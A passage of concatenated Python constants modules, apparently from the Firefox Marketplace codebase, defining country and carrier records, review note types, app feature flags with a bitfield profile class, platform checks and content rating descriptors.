    ('GBR', _lazy(u'United Kingdom')),
    ('USA', _lazy(u'United States')),
    ('UMI', _lazy(u'United States Minor Outlying Islands')),
    ('URY', _lazy(u'Uruguay')),
    ('UZB', _lazy(u'Uzbekistan')),
    ('VUT', _lazy(u'Vanuatu')),
    ('VEN', _lazy(u'Venezuela, Bolivarian Republic of')),
    ('VNM', _lazy(u'Viet Nam')),
    ('VGB', _lazy(u'Virgin Islands, British')),
    ('VIR', _lazy(u'Virgin Islands, U.S.')),
    ('WLF', _lazy(u'Wallis and Futuna')),
    ('ESH', _lazy(u'Western Sahara')),
    ('YEM', _lazy(u'Yemen')),
    ('ZMB', _lazy(u'Zambia')),
    ('ZWE', _lazy(u'Zimbabwe')),
]
########NEW FILE########
__FILENAME__ = carriers
# -*- coding: utf-8 -*-
class CARRIER(object):
    """Base marker class for mobile operator records. Each subclass is a
    static record carrying a numeric `id`, a display `name` and a
    URL-safe `slug`."""
    pass


class UNKNOWN_CARRIER(CARRIER):
    # Used as a dummy.
    id = 0
    name = ''
    slug = 'carrierless'


class TELEFONICA(CARRIER):
    id = 1
    name = u'Telefónica'
    slug = 'telefonica'


class AMERICA_MOVIL(CARRIER):
    id = 2
    name = u'América Móvil'
    slug = 'america_movil'


class CHINA_UNICOM(CARRIER):
    id = 3
    name = u'China Unicom'
    slug = 'china_unicom'


class DEUTSCHE_TELEKOM(CARRIER):
    id = 4
    name = u'Deutsche Telekom'
    slug = 'deutsche_telekom'


class ETISALAT(CARRIER):
    id = 5
    name = u'Etisalat'
    slug = 'etisalat'


class HUTCHINSON_THREE_GROUP(CARRIER):
    id = 6
    name = u'Hutchinson Three Group'
    slug = 'hutchinson_three_group'


class KDDI(CARRIER):
    id = 7
    name = u'KDDI'
    slug = 'kddi'


class KT(CARRIER):
    id = 8
    name = u'KT'
    slug = 'kt'


class MEGAFON(CARRIER):
    id = 9
    name = u'MegaFon'
    slug = 'megafon'


class QTEL(CARRIER):
    id = 10
    name = u'Qtel'
    slug = 'qtel'


class SINGTEL(CARRIER):
    id = 11
    name = u'SingTel'
    slug = 'singtel'


class SMART(CARRIER):
    id = 12
    name = u'Smart'
    slug = 'smart'


class SPRINT(CARRIER):
    id = 13
    name = u'Sprint'
    slug = 'sprint'


class TELECOM_ITALIA_GROUP(CARRIER):
    id = 14
    name = u'Telecom Italia Group'
    slug = 'telecom_italia_group'


class TELENOR(CARRIER):
    id = 15
    name = u'Telenor'
    slug = 'telenor'


class TMN(CARRIER):
    id = 16
    name = u'TMN'
    slug = 'tmn'


class VIMPELCOM(CARRIER):
    id = 17
    name = u'VimpelCom'
    slug = 'vimpelcom'


# slug -> carrier class, built by scanning this module's namespace for
# CARRIER subclasses (the base class itself is excluded).
CARRIER_MAP = dict((c.slug, c) for name, c in locals().items() if
                   type(c) is type and c != CARRIER and issubclass(c, CARRIER))

# Convenience collections derived from CARRIER_MAP.
CARRIERS = CARRIER_MAP.values()
CARRIER_IDS = frozenset([c.id for c in CARRIERS])
CARRIER_SLUGS = frozenset([c.slug for c in CARRIERS])
CARRIER_CHOICES = [(c.id, c) for c in CARRIERS]
########NEW FILE########
__FILENAME__ = comm
from tower import ugettext_lazy as _
# Number of days a token is valid for.
THREAD_TOKEN_EXPIRY = 30

# Number of times a token can be used.
MAX_TOKEN_USE_COUNT = 5

# Maximum number of files that can be attached to a single note.
MAX_ATTACH = 10

# Note type ids; display labels live in NOTE_TYPES below.
NO_ACTION = 0
APPROVAL = 1
REJECTION = 2
DISABLED = 3
MORE_INFO_REQUIRED = 4
ESCALATION = 5
REVIEWER_COMMENT = 6
RESUBMISSION = 7
APPROVE_VERSION_WAITING = 8
ESCALATION_HIGH_ABUSE = 9
ESCALATION_HIGH_REFUNDS = 10
ESCALATION_CLEARED = 11
REREVIEW_CLEARED = 12

# Localizable display labels for each note type id.
NOTE_TYPES = {
    NO_ACTION: _('No action'),
    APPROVAL: _('Approved'),
    REJECTION: _('Rejected'),
    DISABLED: _('Disabled'),
    MORE_INFO_REQUIRED: _('More information requested'),
    ESCALATION: _('Escalated'),
    REVIEWER_COMMENT: _('Comment'),
    RESUBMISSION: _('App resubmission'),
    APPROVE_VERSION_WAITING: _('Approved but waiting to be made public'),
    ESCALATION_CLEARED: _('Escalation cleared'),
    ESCALATION_HIGH_ABUSE: _('Escalated due to High Abuse Reports'),
    ESCALATION_HIGH_REFUNDS: _('Escalated due to High Refund Requests'),
    REREVIEW_CLEARED: _('Re-review cleared')
}

# Note types only visible by reviewers and not developers.
REVIEWER_NOTE_TYPES = (
    ESCALATION,
    REVIEWER_COMMENT,
    ESCALATION_HIGH_ABUSE,
    ESCALATION_HIGH_REFUNDS,
    ESCALATION_CLEARED
)

# Prefix of the reply to address in comm emails.
REPLY_TO_PREFIX = 'commreply+'
def U_NOTE_TYPES():
    """Return NOTE_TYPES with every lazy label coerced to a unicode string."""
    return {note_id: unicode(label)
            for note_id, label in NOTE_TYPES.iteritems()}
def ACTION_MAP(activity_action):
    """Maps ActivityLog action ids to Commbadge note types."""
    # Imported locally — presumably to avoid a circular import at module
    # load time; confirm before hoisting to the top of the file.
    import amo
    # Unmapped actions fall back to NO_ACTION.
    return {
        amo.LOG.APPROVE_VERSION.id: APPROVAL,
        amo.LOG.APPROVE_VERSION_WAITING.id: APPROVAL,
        amo.LOG.APP_DISABLED.id: DISABLED,
        amo.LOG.ESCALATE_MANUAL.id: ESCALATION,
        amo.LOG.ESCALATE_VERSION.id: ESCALATION,
        amo.LOG.ESCALATION_VIP_APP.id: ESCALATION,
        amo.LOG.ESCALATED_HIGH_ABUSE.id: ESCALATION_HIGH_ABUSE,
        amo.LOG.ESCALATED_HIGH_REFUNDS.id: ESCALATION_HIGH_REFUNDS,
        amo.LOG.ESCALATION_CLEARED.id: ESCALATION_CLEARED,
        amo.LOG.REQUEST_INFORMATION.id: MORE_INFO_REQUIRED,
        amo.LOG.REJECT_VERSION.id: REJECTION,
        amo.LOG.REREVIEW_CLEARED.id: REREVIEW_CLEARED,
        amo.LOG.WEBAPP_RESUBMIT.id: RESUBMISSION,
        amo.LOG.COMMENT_VERSION.id: REVIEWER_COMMENT,
    }.get(activity_action, NO_ACTION)
########NEW FILE########
__FILENAME__ = features
from ordereddict import OrderedDict
from django.conf import settings
from tower import ugettext_lazy as _lazy
# WARNING: When adding a new app feature here also include a migration.
#
# WARNING: Order matters here. Don't re-order these or alphabetize them. If you
# add new ones put them on the end.
#
# These are used to dynamically generate the field list for the AppFeatures
# django model in mkt.webapps.models.
APP_FEATURES = OrderedDict([
    # Each entry: CONSTANT key -> {'name': lazy display label,
    # 'description': lazy help text (may be empty), 'apis': tuple of the JS
    # API names the feature corresponds to (empty for non-API features such
    # as QHD or the codec entries)}.
    ('APPS', {
        'name': _lazy(u'App Management API'),
        'description': _lazy(u'The app requires the `navigator.mozApps` API '
                             u'to install and manage other apps.'),
        'apis': ('navigator.mozApps',),
    }),
    ('PACKAGED_APPS', {
        'name': _lazy(u'Packaged Apps Install API'),
        'description': _lazy(
            u'The app requires the `navigator.mozApps.installPackage` API '
            u'to install other packaged apps.'),
        'apis': ('navigator.mozApps.installPackage',),
    }),
    ('PAY', {
        'name': _lazy(u'Web Payment'),
        # NOTE(review): the description mentions `navigator.mozApps` but the
        # apis below are navigator.pay/mozPay — looks like a copy-paste; the
        # localized string is intentionally left untouched here.
        'description': _lazy(u'The app requires the `navigator.mozApps` API.'),
        'apis': ('navigator.pay', 'navigator.mozPay',),
    }),
    ('ACTIVITY', {
        'name': _lazy(u'Web Activities'),
        'description': _lazy(u'The app requires Web Activities '
                             u'(the `MozActivity` API).'),
        'apis': ('MozActivity',),
    }),
    ('LIGHT_EVENTS', {
        'name': _lazy(u'Ambient Light Sensor'),
        'description': _lazy(u'The app requires an ambient light sensor '
                             u'(the `ondevicelight` API).'),
        'apis': ('window.ondevicelight',),
    }),
    ('ARCHIVE', {
        'name': _lazy(u'Archive'),
        'description': u'',
        'apis': (),
    }),
    ('BATTERY', {
        'name': _lazy(u'Battery'),
        'description': _lazy(u'The app requires the `navigator.battery` API.'),
        'apis': ('navigator.battery',),
    }),
    ('BLUETOOTH', {
        'name': u'Bluetooth',
        'description': _lazy(u'The app requires the `navigator.mozBluetooth` '
                             u'API.'),
        'apis': ('navigator.bluetooth', 'navigator.mozBluetooth'),
    }),
    ('CONTACTS', {
        'name': _lazy(u'Contacts'),
        'description': _lazy(u'The app requires the `navigator.mozContacts` '
                             u'API.'),
        'apis': ('navigator.contacts', 'navigator.mozContacts'),
    }),
    ('DEVICE_STORAGE', {
        'name': _lazy(u'Device Storage'),
        'description': _lazy(u'The app requires the Device Storage API to '
                             u'access files on the filesystem.'),
        'apis': ('navigator.getDeviceStorage',),
    }),
    ('INDEXEDDB', {
        'name': u'IndexedDB',
        'description': _lazy(u'The app requires the platform to support '
                             u'IndexedDB.'),
        'apis': ('navigator.indexedDB', 'navigator.mozIndexedDB'),
    }),
    ('GEOLOCATION', {
        'name': _lazy(u'Geolocation'),
        'description': _lazy(u'The app requires the platform to support the '
                             u'`navigator.geolocation` API.'),
        'apis': ('navigator.geolocation',),
    }),
    ('IDLE', {
        'name': _lazy(u'Idle'),
        'description': u'',
        'apis': ('addIdleObserver', 'removeIdleObserver'),
    }),
    ('NETWORK_INFO', {
        'name': _lazy(u'Network Information'),
        'description': _lazy(u'The app requires the ability to get '
                             u'information about the network connection (the '
                             u'`navigator.mozConnection` API).'),
        'apis': ('navigator.mozConnection', 'navigator.mozMobileConnection'),
    }),
    ('NETWORK_STATS', {
        'name': _lazy(u'Network Stats'),
        'description': _lazy(u'The app requires the '
                             u'`navigator.mozNetworkStats` API.'),
        'apis': ('navigator.networkStats', 'navigator.mozNetworkStats'),
    }),
    ('PROXIMITY', {
        'name': _lazy(u'Proximity'),
        'description': _lazy(u'The app requires a proximity sensor (the '
                             u'`ondeviceproximity` API).'),
        'apis': ('navigator.ondeviceproximity',),
    }),
    ('PUSH', {
        'name': _lazy(u'Simple Push'),
        'description': _lazy(u'The app requires the `navigator.mozPush` API.'),
        'apis': ('navigator.push', 'navigator.mozPush'),
    }),
    ('ORIENTATION', {
        'name': _lazy(u'Screen Orientation'),
        # NOTE(review): the name says "Screen Orientation" but the listed API
        # is `ondeviceorientation` (device orientation) — confirm which one
        # is intended before changing either string.
        'description': _lazy(u'The app requires the platform to support the '
                             u'`ondeviceorientation` API.'),
        'apis': ('ondeviceorientation',),
    }),
    ('TIME_CLOCK', {
        'name': _lazy(u'Time/Clock'),
        'description': _lazy(u'The app requires the `navigator.mozTime` API.'),
        'apis': ('navigator.time', 'navigator.mozTime'),
    }),
    ('VIBRATE', {
        'name': _lazy(u'Vibration'),
        'description': _lazy(u'The app requires the device to support '
                             u'vibration (the `navigator.vibrate` API).'),
        'apis': ('navigator.vibrate',),
    }),
    ('FM', {
        'name': u'WebFM',
        'description': _lazy(u'The app requires the `navigator.mozFM` or '
                             u'`navigator.mozFMRadio` APIs.'),
        'apis': ('navigator.mozFM', 'navigator.mozFMRadio'),
    }),
    ('SMS', {
        'name': u'WebSMS',
        'description': _lazy(u'The app requires the `navigator.mozSms` API.'),
        'apis': ('navigator.mozSms', 'navigator.mozSMS'),
    }),
    ('TOUCH', {
        'name': _lazy(u'Touch'),
        'description': _lazy(u'The app requires the platform to support touch '
                             u'events. This option indicates that the app '
                             u'will not function when used with a mouse.'),
        'apis': ('window.ontouchstart',),
    }),
    ('QHD', {
        'name': _lazy(u'Smartphone-Sized Displays (qHD)'),
        'description': _lazy(u'The app requires the platform to have a '
                             u'smartphone-sized display (having qHD '
                             u'resolution). This option indicates that the '
                             u'app will be unusable on larger displays '
                             u'(e.g., tablets, desktop, large or high-DPI '
                             u'phones).'),
        'apis': (),
    }),
    ('MP3', {
        'name': u'MP3',
        'description': _lazy(u'The app requires that the platform can decode '
                             u'and play MP3 files.'),
        'apis': (),
    }),
    ('AUDIO', {
        'name': _lazy(u'Audio'),
        'description': _lazy(u'The app requires that the platform supports '
                             u'the HTML5 audio API.'),
        'apis': ('Audio',),
    }),
    ('WEBAUDIO', {
        'name': _lazy(u'Web Audio'),
        'description': _lazy(u'The app requires that the platform supports '
                             u'the Web Audio API (`window.AudioContext`).'),
        'apis': ('AudioContext', 'mozAudioContext', 'webkitAudioContext'),
    }),
    ('VIDEO_H264', {
        'name': u'H.264',
        'description': _lazy(u'The app requires that the platform can decode '
                             u'and play H.264 video files.'),
        'apis': (),
    }),
    ('VIDEO_WEBM', {
        'name': u'WebM',
        'description': _lazy(u'The app requires that the platform can decode '
                             u'and play WebM video files (VP8).'),
        'apis': (),
    }),
    ('FULLSCREEN', {
        'name': _lazy(u'Full Screen'),
        'description': _lazy(u'The app requires the Full Screen API '
                             u'(`requestFullScreen` or '
                             u'`mozRequestFullScreen`).'),
        'apis': ('document.documentElement.requestFullScreen',),
    }),
    ('GAMEPAD', {
        'name': _lazy(u'Gamepad'),
        'description': _lazy(u'The app requires the platform to support the '
                             u'gamepad API (`navigator.getGamepads`).'),
        'apis': ('navigator.getGamepad', 'navigator.mozGetGamepad'),
    }),
    ('QUOTA', {
        'name': _lazy(u'Quota Management'),
        'description': _lazy(u'The app requires the platform to allow '
                             u'persistent storage limit increases above the '
                             u'normally allowed limits for an app '
                             u'(`window.StorageInfo` or '
                             u'`window.persistentStorage`).'),
        'apis': ('navigator.persistentStorage', 'navigator.temporaryStorage'),
    }),
    ('CAMERA', {
        'name': _lazy(u'Camera'),
        'description': _lazy(u'The app requires the platform to allow access '
                             u'to video from the device camera via a '
                             u'LocalMediaStream object.'),
        'apis': ('navigator.getUserMedia({video: true, picture: true})',),
    }),
    ('MIC', {
        'name': _lazy(u'Microphone'),
        'description': _lazy(u'The app requires the platform to allow access '
                             u'to audio from the device microphone.'),
        'apis': ('navigator.getUserMedia({audio: true})',),
    }),
    ('SCREEN_CAPTURE', {
        'name': _lazy(u'Screen Capture'),
        'description': _lazy(u'The app requires the platform to allow access '
                             u'to the device screen for capture.'),
        'apis': ('navigator.getUserMedia({video: {mandatory: '
                 '{chromeMediaSource: "screen"}}})',),
    }),
    ('WEBRTC_MEDIA', {
        'name': _lazy(u'WebRTC MediaStream'),
        'description': _lazy(u'The app requires the platform to allow web '
                             u'real-time communication browser-to-browser '
                             u'inbound media streams.'),
        'apis': ('MediaStream',),
    }),
    ('WEBRTC_DATA', {
        'name': _lazy(u'WebRTC DataChannel'),
        'description': _lazy(u'The app requires the platform to allow '
                             u'peer-to-peer exchange of data other than audio '
                             u'and video.'),
        'apis': ('DataChannel',),
    }),
    ('WEBRTC_PEER', {
        'name': _lazy(u'WebRTC PeerConnection'),
        'description': _lazy(u'The app requires the platform to allow '
                             u'communication of streaming data between '
                             u'peers.'),
        'apis': ('RTCPeerConnection',),
    }),
    ('SPEECH_SYN', {
        'name': _lazy(u'Web Speech Synthesis'),
        'description': _lazy(u'The app requires the platform to allow the use '
                             u'of text-to-speech.'),
        'apis': ('SpeechSynthesis',)
    }),
    ('SPEECH_REC', {
        'name': _lazy(u'Web Speech Recognition'),
        'description': _lazy(u'The app requires the platform to allow '
                             u'the use of speech-to-text.'),
        'apis': ('SpeechRecognition',)
    }),
    ('POINTER_LOCK', {
        'name': _lazy(u'Pointer Lock'),
        'description': _lazy(u'The app requires the platform to provide '
                             u'additional information and control about the '
                             u'pointer.'),
        'apis': ('document.documentElement.requestPointerLock',)
    }),
    ('NOTIFICATION', {
        'name': _lazy(u'Notifications'),
        'description': _lazy(u'The app requires the platform to allow the '
                             u'displaying phone and desktop notifications to '
                             u'the user.'),
        'apis': ('Notification', 'navigator.mozNotification')
    }),
    ('ALARM', {
        'name': _lazy(u'Alarms'),
        'description': _lazy(u'The app requires the platform to provide '
                             u'access to the device alarm settings to '
                             u'schedule notifications and events at specific '
                             u'time.'),
        'apis': ('navigator.mozAlarms',)
    }),
    ('SYSTEMXHR', {
        'name': _lazy(u'SystemXHR'),
        'description': _lazy(u'The app requires the platform to allow the '
                             u'sending of asynchronous HTTP requests without '
                             u'the restrictions of the same-origin policy.'),
        'apis': ('XMLHttpRequest({mozSystem: true})',)
    }),
    ('TCPSOCKET', {
        'name': _lazy(u'TCP Sockets'),
        'description': _lazy(u'The app requires the platform to allow opening '
                             u'raw TCP sockets.'),
        'apis': ('TCPSocket', 'navigator.mozTCPSocket',
                 'navigator.mozTCPServerSocket')
    }),
    ('THIRDPARTY_KEYBOARD_SUPPORT', {
        'name': _lazy(u'Third-Party Keyboard Support'),
        'description': _lazy(u'The app requires the platform to support '
                             u'third-party keyboards.'),
        'apis': ('navigator.mozInputMethod',),
    }),
    ('NETWORK_INFO_MULTIPLE', {
        'name': _lazy(u'Multiple Network Information'),
        'description': _lazy(u'The app requires the ability to get '
                             u'information about multiple network '
                             u'connections.'),
        'apis': ('navigator.mozMobileConnections',),
    }),
])
class FeatureProfile(OrderedDict):
    """
    Convenience class for performing conversion operations on feature profile
    representations.

    A profile is an ordered mapping of lower-cased APP_FEATURES keys to
    booleans; the ordering (and therefore the bit layout of the integer and
    signature forms) follows APP_FEATURES exactly.
    """
    def __init__(self, **kwargs):
        """
        Creates a FeatureProfile object.

        Takes kwargs to the features to enable or disable. Features not
        specified but that are in APP_FEATURES will be False by default.

        E.g.:

            >>> FeatureProfile(sms=True).to_signature()
            '400.32.1'
        """
        super(FeatureProfile, self).__init__()
        # Every APP_FEATURES key is present, lower-cased, defaulting to False.
        for af in APP_FEATURES:
            key = af.lower()
            self[key] = kwargs.get(key, False)
    @classmethod
    def from_int(cls, features):
        """
        Construct a FeatureProfile object from a integer bitfield.

        >>> FeatureProfile.from_int(0x42)
        FeatureProfile([('apps', False), ('packaged_apps', True), ...)
        """
        instance = cls()
        # Bit 0 corresponds to the *last* APP_FEATURES entry; the first
        # feature occupies the most significant bit (mirrors to_int below).
        for i, k in enumerate(reversed(APP_FEATURES)):
            instance[k.lower()] = bool(features & 1 << i)
        return instance
    @classmethod
    def from_signature(cls, signature):
        """
        Construct a FeatureProfile object from a decimal signature.

        Signature format is '<hex bitfield>.<feature count>.<version>'; only
        the leading hex bitfield is needed to rebuild the profile.

        >>> FeatureProfile.from_signature('40000000.32.1')
        FeatureProfile([('apps', False), ('packaged_apps', True), ...)
        """
        dehexed = int(signature.split('.')[0], 16)
        return cls.from_int(dehexed)
    def to_int(self):
        """
        Convert a FeatureProfile object to an integer bitfield.

        >>> profile.to_int()
        66
        """
        features = 0
        # Inverse of from_int: last feature -> bit 0, first feature -> MSB.
        for i, v in enumerate(reversed(self.values())):
            features |= bool(v) << i
        return features
    def to_signature(self):
        """
        Convert a FeatureProfile object to its decimal signature.

        >>> profile.to_signature()
        '40000000.32.1'
        """
        return '%x.%s.%s' % (self.to_int(), len(self),
                             settings.APP_FEATURES_VERSION)
    def to_list(self):
        """
        Returns a list representing the true values of this profile.
        """
        return [k for k, v in self.iteritems() if v]
    def to_kwargs(self, prefix=''):
        """
        Returns a dict representing the false values of this profile.

        Parameters:
        - `prefix` - a string prepended to the key name. Helpful if being used
                     to traverse relations

        This only includes keys for which the profile is False, which is useful
        for querying apps where we want to filter by apps which do not require
        a feature.

        >>> profile = FeatureProfile.from_signature(request.get('pro'))
        >>> Webapp.objects.filter(**profile.to_kwargs())
        """
        return dict((prefix + k, False) for k, v in self.iteritems() if not v)
########NEW FILE########
__FILENAME__ = feed
from tower import ugettext_lazy as _lazy
# Slugs for the kinds of visual treatment a feed app entry can have.
FEEDAPP_TYPE_ICON = 'icon'
FEEDAPP_TYPE_IMAGE = 'image'
FEEDAPP_TYPE_DESC = 'description'
FEEDAPP_TYPE_QUOTE = 'quote'
FEEDAPP_TYPE_PREVIEW = 'preview'
# Django-style (value, translated label) choices for the types above.
FEEDAPP_TYPES = (
    (FEEDAPP_TYPE_ICON, _lazy(u'Icon')),
    (FEEDAPP_TYPE_IMAGE, _lazy(u'Header Graphic')),
    (FEEDAPP_TYPE_DESC, _lazy(u'Description')),
    (FEEDAPP_TYPE_QUOTE, _lazy(u'Quote')),
    (FEEDAPP_TYPE_PREVIEW, _lazy(u'Screenshot')),
)
########NEW FILE########
__FILENAME__ = lookup
# Result caps for the lookup tool; exact consumers live in the lookup views
# (names suggest a hard maximum and a per-search limit — confirm there).
MAX_RESULTS = 200
SEARCH_LIMIT = 20
########NEW FILE########
__FILENAME__ = payments
from tower import ugettext as _
# Refund state machine values as stored/exchanged with the payment backend.
PENDING = 'PENDING'
COMPLETED = 'OK'
FAILED = 'FAILED'
# NOTE(review): `_` here is the non-lazy `ugettext` (see the import above),
# so these labels are translated once at import time in whatever locale is
# active — probably should be ugettext_lazy; confirm before changing.
REFUND_STATUSES = {
    PENDING: _('Pending'),
    COMPLETED: _('Completed'),
    FAILED: _('Failed'),
}
# SellerProduct access types.
ACCESS_PURCHASE = 1
ACCESS_SIMULATE = 2
# Numeric payment check outcomes mapped to their wire labels.
PAYMENT_STATUSES = {
    1: 'passed',
    2: 'failed'
}
########NEW FILE########
__FILENAME__ = platforms
import re
from tower import ugettext_lazy as _
from versions.compare import version_int as vint
# These are the minimum versions required for `navigator.mozApps` support.
# Each entry is ([user-agent regexes capturing the version], minimum
# version_int) — the capture group is compared against the vint() threshold.
APP_PLATFORMS = [
    # Firefox for Desktop.
    (
        [
            # Raw strings so the `\d` escapes reach the regex engine verbatim
            # (non-raw '\d' relies on Python passing unknown escapes through).
            re.compile(r'Firefox/([\d.]+)')
        ],
        vint('16.0')
    ),
    # Firefox for Android.
    (
        [
            re.compile(r'Fennec/([\d.]+)'),
            re.compile(r'Android; Mobile; rv:([\d.]+)'),
            re.compile(r'Mobile; rv:([\d.]+)')
        ],
        vint('17.0')
    )
]
def FREE_PLATFORMS(request=None, is_packaged=False):
    """
    Return the (slug, translated label) platform choices for free apps.

    For packaged apps, the desktop and Android choices are only offered
    when the corresponding waffle flag ('desktop-packaged' /
    'android-packaged') is active for `request`.
    """
    import waffle
    android_ok = bool(request and
                      waffle.flag_is_active(request, 'android-packaged'))
    desktop_ok = bool(request and
                      waffle.flag_is_active(request, 'desktop-packaged'))
    choices = [('free-firefoxos', _('Firefox OS'))]
    if not is_packaged or desktop_ok:
        choices.append(('free-desktop', _('Firefox for Desktop')))
    if not is_packaged or android_ok:
        choices.append(('free-android-mobile', _('Firefox Mobile')))
        choices.append(('free-android-tablet', _('Firefox Tablet')))
    return tuple(choices)
def PAID_PLATFORMS(request=None, is_packaged=False):
    """
    Return the (slug, translated label) platform choices for paid apps.

    Android choices require the 'android-payments' waffle flag; packaged
    apps additionally require 'android-packaged'.
    """
    import waffle
    payments_ok = bool(request and
                       waffle.flag_is_active(request, 'android-payments'))
    packaged_ok = bool(request and
                       waffle.flag_is_active(request, 'android-packaged'))
    choices = [('paid-firefoxos', _('Firefox OS'))]
    if payments_ok and (not is_packaged or packaged_ok):
        choices.append(('paid-android-mobile', _('Firefox Mobile')))
        choices.append(('paid-android-tablet', _('Firefox Tablet')))
    return tuple(choices)
# Extra information about those values for display in the page.
# Keys are the platform slugs produced by FREE_PLATFORMS/PAID_PLATFORMS.
DEVICE_LOOKUP = {
    'free-firefoxos': _('Fully open mobile ecosystem'),
    'free-desktop': _('Windows, Mac and Linux'),
    'free-android-mobile': _('Android smartphones'),
    'free-android-tablet': _('Tablets'),
    'paid-firefoxos': _('Fully open mobile ecosystem'),
    'paid-android-mobile': _('Android smartphones'),
    'paid-android-tablet': _('Tablets'),
}
########NEW FILE########
__FILENAME__ = ratingdescriptors
from tower import ugettext_lazy as _lazy
# WARNING: When adding a new rating descriptor here also include a migration.
# All descriptor keys must be prefixed by the rating body (e.g. USK_).
#
# These are used to dynamically generate the field list for the
# RatingDescriptors Django model in mkt.webapps.models.
RATING_DESCS = {
    # CLASSIND (Brazil) descriptors.
    'CLASSIND_CRIMINAL_ACTS': {'name': _lazy('Criminal Acts')},
    'CLASSIND_DRUGS': {'name': _lazy('Drugs')},
    'CLASSIND_DRUGS_ILLEGAL': {'name': _lazy('Illegal Drugs')},
    'CLASSIND_DRUGS_LEGAL': {'name': _lazy('Legal Drugs')},
    # L10n: `Language` as in foul language.
    'CLASSIND_LANG': {'name': _lazy('Inappropriate Language')},
    'CLASSIND_NUDITY': {'name': _lazy('Nudity')},
    # L10n: `Sex` as in sexual, not as in gender.
    'CLASSIND_SEX': {'name': _lazy('Sex')},
    'CLASSIND_SEX_CONTENT': {'name': _lazy('Sexual Content')},
    'CLASSIND_SEX_EXPLICIT': {'name': _lazy('Explicit Sex')},
    'CLASSIND_SHOCKING': {'name': _lazy('Impacting Content')},
    'CLASSIND_VIOLENCE': {'name': _lazy('Violence')},
    'CLASSIND_VIOLENCE_EXTREME': {'name': _lazy('Extreme Violence')},
    # ESRB (Americas) descriptors.
    'ESRB_ALCOHOL_REF': {'name': _lazy('Alcohol Reference')},
    'ESRB_ALCOHOL_TOBACCO_REF': {'name': _lazy('Alcohol and Tobacco Reference')},
    'ESRB_ALCOHOL_TOBACCO_USE': {'name': _lazy('Use of Alcohol and Tobacco')},
    'ESRB_ALCOHOL_USE': {'name': _lazy('Use of Alcohol')},
    'ESRB_BLOOD': {'name': _lazy('Blood')},
    'ESRB_BLOOD_GORE': {'name': _lazy('Blood and Gore')},
    'ESRB_COMIC_MISCHIEF': {'name': _lazy('Comic Mischief')},
    'ESRB_CRIME': {'name': _lazy('Crime')},
    'ESRB_CRIME_INSTRUCT': {'name': _lazy('Criminal Instruction')},
    'ESRB_CRUDE_HUMOR': {'name': _lazy('Crude Humor')},
    'ESRB_DRUG_ALCOHOL_REF': {'name': _lazy('Drug and Alcohol Reference')},
    'ESRB_DRUG_ALCOHOL_TOBACCO_REF': {'name': _lazy('Drug, Alcohol, and Tobacco Reference')},
    'ESRB_DRUG_ALCOHOL_TOBACCO_USE': {'name': _lazy('Use of Drug, Alcohol, and Tobacco')},
    'ESRB_DRUG_ALCOHOL_USE': {'name': _lazy('Use of Drug and Alcohol')},
    'ESRB_DRUG_REF': {'name': _lazy('Drug Reference')},
    'ESRB_DRUG_TOBACCO_REF': {'name': _lazy('Drug and Tobacco Reference')},
    'ESRB_DRUG_TOBACCO_USE': {'name': _lazy('Use of Drug and Tobacco')},
    'ESRB_DRUG_USE': {'name': _lazy('Use of Drugs')},
    'ESRB_FANTASY_VIOLENCE': {'name': _lazy('Fantasy Violence')},
    'ESRB_HATE_SPEECH': {'name': _lazy('Hate Speech')},
    'ESRB_INTENSE_VIOLENCE': {'name': _lazy('Intense Violence')},
    # L10n: `Language` as in foul language.
    'ESRB_LANG': {'name': _lazy('Language')},
    'ESRB_MILD_BLOOD': {'name': _lazy('Mild Blood')},
    'ESRB_MILD_FANTASY_VIOLENCE': {'name': _lazy('Mild Fantasy Violence')},
    'ESRB_MILD_LANG': {'name': _lazy('Mild Language')},
    'ESRB_MILD_VIOLENCE': {'name': _lazy('Mild Violence')},
    'ESRB_NUDITY': {'name': _lazy('Nudity')},
    'ESRB_PARTIAL_NUDITY': {'name': _lazy('Partial Nudity')},
    'ESRB_REAL_GAMBLING': {'name': _lazy('Real Gambling')},
    'ESRB_SCARY': {'name': _lazy('Scary Themes')},
    'ESRB_SEX_CONTENT': {'name': _lazy('Sexual Content')},
    'ESRB_SEX_THEMES': {'name': _lazy('Sexual Themes')},
    'ESRB_SIM_GAMBLING': {'name': _lazy('Simulated Gambling')},
    'ESRB_STRONG_LANG': {'name': _lazy('Strong Language')},
    'ESRB_STRONG_SEX_CONTENT': {'name': _lazy('Strong Sexual Content')},
    'ESRB_SUGGESTIVE': {'name': _lazy('Suggestive Themes')},
    'ESRB_TOBACCO_REF': {'name': _lazy('Tobacco Reference')},
    'ESRB_TOBACCO_USE': {'name': _lazy('Use of Tobacco')},
    'ESRB_VIOLENCE': {'name': _lazy('Violence')},
    'ESRB_VIOLENCE_REF': {'name': _lazy('Violence References')},
    # Generic body descriptors.
    'GENERIC_DISCRIMINATION': {'name': _lazy('Discrimination')},
    'GENERIC_DRUGS': {'name': _lazy('Drugs')},
    'GENERIC_GAMBLING': {'name': _lazy('Gambling')},
    # L10n: `Language` as in foul language.
    'GENERIC_LANG': {'name': _lazy('Language')},
    'GENERIC_ONLINE': {'name': _lazy('Online')},
    'GENERIC_SCARY': {'name': _lazy('Fear')},
    # L10n: `Sex` as in sexual, not as in gender.
    'GENERIC_SEX_CONTENT': {'name': _lazy('Sex')},
    'GENERIC_VIOLENCE': {'name': _lazy('Violence')},
    # PEGI (Europe) descriptors.
    'PEGI_DISCRIMINATION': {'name': _lazy('Discrimination')},
    'PEGI_DRUGS': {'name': _lazy('Drugs')},
    'PEGI_GAMBLING': {'name': _lazy('Gambling')},
    # L10n: `Language` as in foul language.
    'PEGI_LANG': {'name': _lazy('Language')},
    'PEGI_ONLINE': {'name': _lazy('Online')},
    'PEGI_SCARY': {'name': _lazy('Fear')},
    # L10n: `Sex` as in sexual, not as in gender.
    'PEGI_SEX_CONTENT': {'name': _lazy('Sex')},
    'PEGI_VIOLENCE': {'name': _lazy('Violence')},
    # PEGI's version of interactive elements.
    'PEGI_USERS_INTERACT': {'name': _lazy('Social Interaction Functionality')},
    'PEGI_SHARES_INFO': {'name': _lazy('Personal Data Sharing')},
    'PEGI_DIGITAL_PURCHASES': {'name': _lazy('In-app Purchase Option')},
    'PEGI_SHARES_LOCATION': {'name': _lazy('Location Data Sharing')},
    # USK (Germany) descriptors.
    'USK_DISCRIMINATION': {'name': _lazy('Discrimination')},
    'USK_DRUGS': {'name': _lazy('Drugs')},
    # L10n: `Language` as in foul language.
    'USK_LANG': {'name': _lazy('Explicit Language')},
    'USK_SCARY': {'name': _lazy('Frightening Content')},
    'USK_SEX_CONTENT': {'name': _lazy('Sexual Content')},
